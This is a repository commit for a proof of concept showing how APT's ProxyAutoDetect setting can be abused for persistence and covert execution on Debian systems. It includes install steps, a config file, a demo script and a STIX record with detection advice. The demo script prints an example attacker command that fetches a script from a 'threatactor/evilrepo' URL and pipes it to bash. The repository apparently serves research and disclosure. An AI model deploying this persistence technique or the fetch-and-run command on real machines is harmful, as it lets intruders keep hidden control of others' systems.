sneakygeek/apt-detonate
2
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

first commit

Browse Source
This commit is contained in:
Phillip Tarrant
2025-06-20 15:31:27 +00:00
commit 1a9b47a7a2
5 changed files with 116 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

65
README.md Normal file
View File

@@ -0,0 +1,65 @@
# APT ProxyAutoDetect Persistence (PoC)
This repository demonstrates a technique for achieving execution and persistence by abusing an **undocumented feature** in the Advanced Packaging Tool (APT) on Debian-based Linux systems.
---
## 🔍 Technique Summary
APT supports an undocumented config directive:
Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";
If placed in a file inside `/etc/apt/apt.conf.d/`, APT will execute the specified binary whenever it attempts to access an HTTP repository (e.g., during `apt update`, `apt install`, etc.).
- `stdout` of the binary is treated as the proxy URL.
- `stderr` is shown to the user but ignored.
- No arguments are allowed — only absolute binary paths.
---
## 🎯 Use Cases
- **Persistence**: Binary is run every time APT is used, including via automated scripts or cron.
- **Execution**: Runs code covertly under a legitimate process tree (`apt` → custom binary).
- **Defense Evasion**: Doesnt rely on systemd, cron, or shell profile files.
---
## ⚙️ Demo Setup
1. Install the config and script:
# This copies the config and shell script to /etc/apt/apt.conf.d/
```
sudo ./install.sh
```
2. Run `apt update`:
```
sudo apt update
```
---
## 🧬 MITRE ATT&CK Mapping
| Tactic | Technique |
|-----------------|------------------------------------------------|
| Persistence | [T1546] Event Triggered Execution |
| Execution | [T1546.008] Application Shimming (analogous) |
| Defense Evasion | [T1565.001] Stored Data Manipulation |
---
## 📩 Disclosure
This issue has been reported to the MITRE ATT&CK team for inclusion as a technique or sub-technique.
---
## 🔐 Author
Phillip Tarrant
[https://www.linkedin.com/in/phillip-tarrant-cyber/](https://www.linkedin.com/in/phillip-tarrant-cyber/)

2
poc/30detectproxy Normal file
View File

@@ -0,0 +1,2 @@
// Demonstration of ProxyAutoDetect persistence
Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";

10
poc/detect-http-proxy Normal file
View File

@@ -0,0 +1,10 @@
#!/bin/bash
# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
echo "http://127.0.0.1:8888" # stdout is interpreted as the proxy address
# Simulated threat actor behavior
echo "If I was a threat actor, I might do something like:" >&2
echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2

13
poc/install.sh Normal file
View File

@@ -0,0 +1,13 @@
#!/bin/bash
set -e
BIN_PATH="$(pwd)/detect-http-proxy"
CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
chmod +x detect-http-proxy
echo "[*] Copying APT config to ${CONF_PATH}"
sudo cp 30detectproxy $CONF_PATH
echo "[*] Done. Now run: sudo apt update"

26
stix/apt-proxyautodetect-technique.json Normal file
View File

@@ -0,0 +1,26 @@
{
"type": "attack-pattern",
"spec_version": "2.1",
"id": "attack-pattern--4cba5eeb-0031-47d3-9390-9f4fa6b57f88",
"created": "2025-06-20T00:00:00Z",
"modified": "2025-06-20T00:00:00Z",
"name": "APT ProxyAutoDetect Abuse for Execution",
"description": "Adversaries may abuse the undocumented Acquire::http::ProxyAutoDetect directive in APT by placing a config file that points to a local binary. This binary is executed whenever APT accesses an HTTP repository, allowing for stealthy persistence and execution.",
"x_mitre_platforms": ["Linux"],
"x_mitre_tactics": ["persistence", "execution", "defense-evasion"],
"x_mitre_permissions_required": ["root"],
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Command execution"
],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"x_mitre_detection": "Monitor /etc/apt/apt.conf.d/ for unusual files. Look for Acquire::http::ProxyAutoDetect values pointing to local binaries. Detect apt-spawned processes that are not part of expected behavior.",
"x_mitre_version": "1.0",
"x_mitre_contributors": ["Phillip John Tarrant"]
}